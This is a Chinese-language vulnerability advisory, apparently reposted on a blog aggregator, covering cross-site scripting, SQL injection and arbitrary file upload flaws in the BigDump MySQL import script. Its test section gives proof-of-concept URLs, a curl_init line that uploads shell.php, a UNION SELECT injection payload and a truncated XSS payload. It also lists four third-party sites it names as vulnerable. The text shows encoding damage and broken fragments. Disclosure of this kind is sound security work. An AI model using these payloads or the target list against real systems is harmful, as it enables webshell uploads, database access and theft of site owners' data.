任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞
發(fā)布日期:2012-11-28
更新日期:2012-12-04
受影響系統(tǒng):
ozerov BigDump 0.29b
描述:
--------------------------------------------------------------------------------
BUGTRAQ? ID: 56744
BigDump 是由德國(guó)人Alexey Ozerov 用PHP語(yǔ)言開(kāi)發(fā)的一個(gè)工具腳本,用來(lái)導(dǎo)入批量mysql數(shù)據(jù)。
BigDump 0.29b、0.32b及其他版本在實(shí)現(xiàn)上存在跨站腳本、SQL注入、任意文件上傳漏洞,利用這些漏洞攻擊者可竊取Cookie身份驗(yàn)證憑證、上傳任意文件、訪問(wèn)或修改數(shù)據(jù)、利用下層數(shù)據(jù)庫(kù)內(nèi)的其他漏洞。
鏈接:http://packetstormsecurity.org/files/118463/bigdump032b-shellxsssql.txt
*>
測(cè)試方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)!
http://www.example.com/bigdump.php?start= [SQL]
http://www.example.com/bigdump.php?start= [XSS]
http://www.example.com/bigdump.php [File Upload]
# Expl0it/P0c ###################
http://site.com/bigdump.php?start=? < Sql Vulnerability Path >
http://site.com/bigdump.php?start=? < Xss Vulnerability Path >
http://site.com/bigdump.php? ? ? ? < Arbitrary Upload? Path >
# Expl0it/P0c/upload ###############
Input $ch = curl_init("http://site.com/bigdump.php?start=shell.php")
Output $ch = curl_init("http://site.com/bigdump/uploads/shell.php")
# Expl0it/P0c/Sql ###################
+union+select+1,2,3,4,5,6,7,8,9,10--+
# Expl0it/P0c/Xss ###################
">
# Vulnerability/C0de/###################
?action=step3" enctype="multipart/form-data">Dump file:
# Samples/Arbitrart_Upload/Sql/Xss ####################
http://www.fs7a.net/vb/1/bigdump.php
http://www.lis186.com/dump/bigdump.php
http://bigw3.com/bigdump.php
http://twin.skr.jp/bigdump/bigdump.php
http://www.fs7a.net/vb/1/bigdump.php?start=%
http://www.lis186.com/dump/bigdump.php?start=%
http://bigw3.com/bigdump.php?start=%
http://twin.skr.jp/bigdump/bigdump.php?start=%
建議:
--------------------------------------------------------------------------------
廠商補(bǔ)丁:
ozerov
------
目前廠商還沒(méi)有提供補(bǔ)丁或者升級(jí)程序,我們建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁(yè)以獲取最新版本:
總結(jié)
以上是生活随笔為你收集整理的任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: shell自动安装mysql_RPM包安
- 下一篇: mysql 5.1.60.tar.gz_